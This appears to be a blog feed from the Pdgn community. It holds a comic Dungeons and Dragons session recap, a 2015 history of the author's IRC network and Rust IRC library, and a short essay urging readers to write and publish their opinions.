After travelling for a full day, the party decides to set up camp for nightfall. Vanswaxle is placed first on watch for the night. During his watch, he swears to see a large, fast-moving beast headed toward the camp, and he quickly awakens everyone using his telepathic speech. However, upon further investigation, none of our party is able to see any such beast, and indeed, there wasn’t one. Before noticing the lack of incoming enemies, Battle Boar springs to action and uses his signal whistle to call two pigs to his side. Lonely, the pigs decide to hang around for the night. Having pre-emptively employed magic to make himself invisible, Vanswaxle sees it fit to take advantage of his invisibility and so he strips naked and runs around the camp. Unfortunately for him, the desert nights in Hava are bitterly cold, and he begins to catch frostbite in his toes and netherregions. Thankfully, Battle Boar is more than equipped to heal his wounds and prevent further damage from the freezing cold. With that excursion passed, Raz is set on watch, and the rest of our party heads back to sleep.

A short while into his watch, Raz spots three small, four-legged creatures headed toward the camp. Raz awakens the party, and Vanswaxle sends for his imp to scout out the incoming enemies. Vanswaxle’s imp returns and informs the party that three liches are on the way causing the party to ignore the enemies and argue about whether or not to engage the liches. Fortunately for our party, the imp was tragically mistaken and the creature instead appeared to be jackals. Noticing this fact, Battle Boar once again springs to action trying to charm the jackals into friendship, but is ultimately unsuccessful. Nevertheless, with their powerful magic, our party is quickly able to deal with one of the creatures, killing it almost instantly. At this point, the two remaining jackals transform into humanoid jackal hybrids, and our party realizes that they are in fact jackalweres. The jackalweres manage to deal some serious damage to our rogue, Raz, but once again, Battle Boar comes to the rescue with his healing. With more magic, our party knocks a second jackalwere unconscious. Then, feeling diplomatic and disinterested in combat, Vanswaxle telepathically offers for the jackalwere to stand down, promising to have Battle Boar heal his unconscious companion. With little choice, the jackalwere takes the deal, and stands down. Our party makes good on the deal, and revitalizes the other jackalwere. Feeling wary of the jackalweres because of their reputation as a species, our party tries to determine if they’re up to something. However, they decide as a group that the jackalweres are likely trustworthy.

Even still, Lucifirius and Vanswaxle are particularly touchy about the cargo in transit. So, they decide to pretend to sleep and to keep watch over the jackalweres. Meanwhile, the rest of the party heads back to bed. The weaker jackalwere then pulls some meat from his pants pocket and begins to cook it. Noticing this, Vanswaxle disguises his voice and speaks telepathically to the jackalwere asking if he can share some meat, and ultimately, trying to seduce him. Initially, his attempts to seduce him fail, but with enough persistence, he gets through. The jackalwere leaves the camp, shapeshifts into a human, and heads back to Karri to meet up with his telepathic seducer. Distracted by this endeavour, Vanswaxle fails to notice the other jackalwere sneaking up on him, and before he has the chance to react, the jackalwere attacks him lying down, critically injuring him. While much of the party springs awake, Battle Boar remains asleep and is thus unable to offer healing to the weakened Vanswaxle. Vanswaxle uses his magic to try to escape the jackalwere and give his party members a chance to kill him, but the jackalwere is much faster. Ultimately, the jackalwere is able to knock Vanswaxle unconscious before the skilled shot of Raz’s bow is able to kill him. With one jackalwere gone and the other two dead, Ez-Ra uses his medical kit to stabilize Vanswaxle, and the party is able to collect itself once more.

Next time on Pdgn plays D&D: Magical Cauldron vs. The World

A Brief History of Pdgn

Wed, 11 Feb 2015 13:56:00 +0000

The idea for Pdgn first came in June of 2014. For reasons that I can’t recall, I was drawn to searching for a domain. I didn’t really have a purpose for it. I was just poking around to see if anything cool was available. I stumbled upon the domain pdgn.co, and I thought it was concise, oddly charming, and easily pronouncable (as the English word, pigeon). As I said, I didn’t have a purpose, and so, I didn’t purchase the domain. I did, however, keep it in my mind.

Around this time, my productivity levels had plummetted immensely. I had begun to loathe working in Java, and my constant attempts to take on incredibly large projects were going nowhere. I’d been trying to learn Haskell on-and-off for roughly a year, and I’d fallen completely in love with functional programming as a paradigm. In another IRC network that I call home (FyreChat), I’d also been exposed to Rust. I didn’t really think of myself as capable of programming in a systems language, but I liked that Rust had many of the nice idioms that I had come to appreciate from my struggles with Haskell. So, I wanted to jump ship from Java, and I was looking at both Rust and Haskell. However, I didn’t have any ideas of reasonable things to work on once I did. That changed in July.

In July of that year, as the next step in a big push to distance myself from Google, I had decided that I wanted to run a small, privacy-first email service and that I wanted to write all the software myself. I had some experience with IRC as a protocol, and I figured that the email protocols couldn’t be that much worse. So, I bought the domain. I tried to make the decision of whether I wanted to write it in Rust or Haskell. Rust would be hard because I was scared of the idea of having to manage memory myself, and Haskell would be hard because I was still struggling to understand how to work with state and the real world. Ultimately, at the urging of some friends, I decided that I would write the service in Rust. I also decided that I may as well combine it with a privacy-first chat service as well. My goal was to incorporate the best privacy practices available for existing protocols, and thus I wasn’t going to invent a new chat client or a new email protocol and so on.

Still, even with an idea, my motivation was pretty low. I looked at the task of learning a new language as an impossibly high barrier, and much like previous projects, I worried that it was too large of a task for me to finish. Having already assured some of my friends that it would happen, I continually put off the idea and then put it off again. By the time summer ended, I had made no progress at all on my goal, and had made no effort to learn Rust. My friend Jacob bugged me countless times about writing the service because he wanted a new email address himself, but even that had done nothing to drive progress.

I was about to start University, and I stopped to look back at what I had done on the summer. When I did, I was saddened to see that I had done just about nothing and I wondered why. I wrote a blog post about it, and decided that I needed to do things differently. So when I started school, I decided that I was going to learn Rust by working with something familiar before doing anything unfamiliar. Dungeons and Dragons, 5th Edition was released around this time, and I wanted to play it with people over IRC. So, I thought that it would be a good opportunity to write an IRC bot to run the game. There was a clear path to starting off small, and a clear path for it to be more complicated. So, it seemed like a great first project. I split the project into two parts, the IRC library and the bot itself, and I set off to learn Rust.

From September 10th on, I was throwing all the free time that I could muster into this bot. Bored in my data structures class, I started using that time to work on it, too. Once I got over the hump of struggling with the language (and especially lifetimes), I started making good progress. I knocked out a lot of the features I had planned, and by the end of October, I found myself looking mostly at some of the harder stuff. I wanted to implement a battle map, and that required an associated web server component. I was worried about how hard it was going to be, and so I went looking elsewhere for places to continue my learning of Rust. Eventually, it occurred to me that a part of my goal had been to run an IRC server in Rust. I obviously couldn’t write it immediately, but I could definitely launch a server with an existing IRCd and make it a long-term project.

With that, on October 27th, 2014, Pdgn as an IRC network was born. I reached out to my high school friends Jacob and Alok, and asked them to join. We had run an online computer science competition earlier in the year (HSCTF), and I had missed being able to interact with them over IRC. In what can only be described as perfect timing, PicoCTF had also started that day. This meant that Jacob and Alok, both participating in it, were immediately in contact with many of the participants of HSCTF who spent their time in our IRC channel on Mibbit during and after the competition. The channel had all but completely disappated by this time, and so I hadn’t really heard from any of them. They both took this as an opportunity to recruit, and they convinced a number of old friends (and former HSCTF participants) to join the network. Slowly, but surely, we garnered a small userbase.

Seeing all the progress that was made in a day, I immediately started work on our own set of IRC services written in Rust. I didn’t have a lot of knowledge about how they were implemented, and so, I assumed that they were just normal bots. For anyone looking to not replicate my mistake, services are almost always implemented as a separate server linked to the main hub. Regardless, I carried on blindly. Within two days, nickname and channel registration was implemented. The services were starting to shape up, and I was excited to be putting them to immediate use. One issue I encountered along the way was that the user mode marking that you’re identified (+R) is actually only able to be set by a server. I didn’t have a server component to my IRC library, and I knew that that would be a huge investment. So, I modified the m_samode module for InspIRCd to allow operators to set the mode +R with the SAMODE command. I was the only server operator, and so I figured that it wouldn’t be much of an issue. With that, the bot was able to mark people as being identified.

A few days later, I found myself joining a discussion on the Mozilla IRC about IRC libraries in Rust. As far as I knew, my library was the only one that built on the latest Rust, as many of the previous developers had abandoned their work. While my library worked fine for my purposes, others were critical of my use of callbacks to define IRC functionality. Another developer who had previously worked on an IRC library pointed me in the direction of a better design. They recommended that I take advantage of iterators because of all of the sugar associated with them in Rust. So, on November 2nd, I did a large refactor of my IRC library. I dropped a lot of the excess, and implemented an iterator-based design. From there, I started down a long path of improving the library. I wrote a collection of utility functions that evolved into a utility wrapper to the server objects. I rewrote tons of unit tests. I added SSL support, and working user tracking with access level support. I dealt with crate name squatting on the Rust crate repository, and eventually claimed the crate name irc. I made the library thread-safe, and fully specification compliant. The library grew into something substantial, and I was happy for it.

Both bots weathered the storm of the redesign, and while the Dungeons and Dragons bot had stagnated, the services bot continued to grow and expand. At Jacob’s urging, I implemented the game Resistance as an optional feature for it. I also added a counter to track stupid mistakes, and a full-featured voting-based administration tool. The idea was to use the bot (named Pidgey, and declared our mascot) to allow fully democratic channel administration. We found out quickly that this was less than desirable. People started lots of non-sense votes, and rarely did votes ever pass. Eventually, I retired the democracy feature, and Pidgey went back to just managing channel and nickname registration (with Resistance and derps on the side). The server kept on running.

After a few months, it became more apparent that running an IRC network on a single server was less than desirable. I wasn’t able to do updates of any kind, and maintenance meant that everything was completely inaccessible. So, I set out to make Pdgn into an actual network instead. The first step was to move my site off of Ghost, which was being hosted on the same server as the IRC network. Once that was done, I got two new, smaller servers for the network. One in San Fransisco, and one in New York. I had to decide on names, and I wanted an overarching theme for them. So, I settled on genera of pigeons as an appropriate name. The hub server in New York was named Columba, after the genus of typical Old World pigeons. The server in San Fransisco was named Raphus, after the genus of the dodo (which is, to some people’s suprise including my own, a type of pigeon!).

On February 3rd, 2015, both of the new servers went live, and the original server that housed Pdgn was taken down. With this, the original services bot was also retired. On February 9th, I released an official pdgn.co site, and then on February 10th, I released the official pdgn.co community blog. This brings us to today, February 11th, where I have now, for the first time, documented the history of the network. It’s hard to say where the future will take us, but I hope to expand the network with more servers and more people. This is really only the beginning.

Hello, World!

Tue, 10 Feb 2015 22:56:15 +0000

Communication. It’s what separates a painter from an artist and a performer from a musician. It turns a mob into an army and a fight into a debate. It’s what separates coexistence and civilization.

In the world of computer science, we have a fictitious creation called the Nondeterministic Computer. The Nondeterministic Computer, given a problem, tests every possible solution of the problem instantanteously, and reports the correct answers. The Nondeterministic Computer, were it to be realized, would revolutionize computer science, data science, protein folding research, and of course cryptography.

Guess what? You have the functional equivalent of a Nondeterministic Computer right now. You have, to put it lightly, millions of brilliant minds at your disposal. Combined, you have millions of years of experience, instinct, opinion, and innovation at your command.

Because just as wonderful as Nondeterministic Computing is Nondeterministic Communication. Of perhaps the 2,000 people that will read this post in the next couple of months, some will agree. Some will disagree. Some will be affected by what I say, and some will make it a mission to prove me wrong. The vast majority will ignore it, spending less than 5 seconds on the page, and only skimming a few words.

For all practical purposes, I am running my thoughts through a vast supercomputer and getting a decent representation of humanity’s views on them. I can do this anonymously, and I can do this for free.

In the scientific and academic world, communication happens through papers. Progress happens when Darwin must publish his research before Wallace, when Einstein refutes Newton, when Watson and Crick race Franklin’s lab, when Shamir writes a paper breaking a cryptosystem Merkle and Hellman thought was secure.

In the tech world, progress happens when someone—a high schooler, an employee at a startup, or the creator of Linux–leaves a vitriolic comeback on a blog post.

Blog posts are what truly reflect us: our opinions, our rants, our tutorials, and our reviews document, piece by piece, the world we have created. And the comments document what we think of it.

In other words: you are responsible for the canon in this world. For perpetuating knowledge. For inciting discussion. For starting arguments. For causing change.

So write! Write controversial things! Express unpopular opinions, and do so vehemently! Hate on something everyone adores! Use strongly-worded phrases. Use exclamation points. Make noise, be mean. Get harsh feedback, it’s what you want.

Be wrong once in a while. Say stuff you’ll cringe at in a year (because, to be honest, you’ll cringe at everything you wrote a year back). Do what it takes to put your opinions out there, because they matter. As a culture, we’re fallible, and someone needs to call us out on it.

Your words are elegant weapons; use them to create a more civilized age.

And don’t be afraid to put your thoughts through a nondeterminisic computer just because it’ll reject 99.99% of them. That’s what nondeterministic computers do.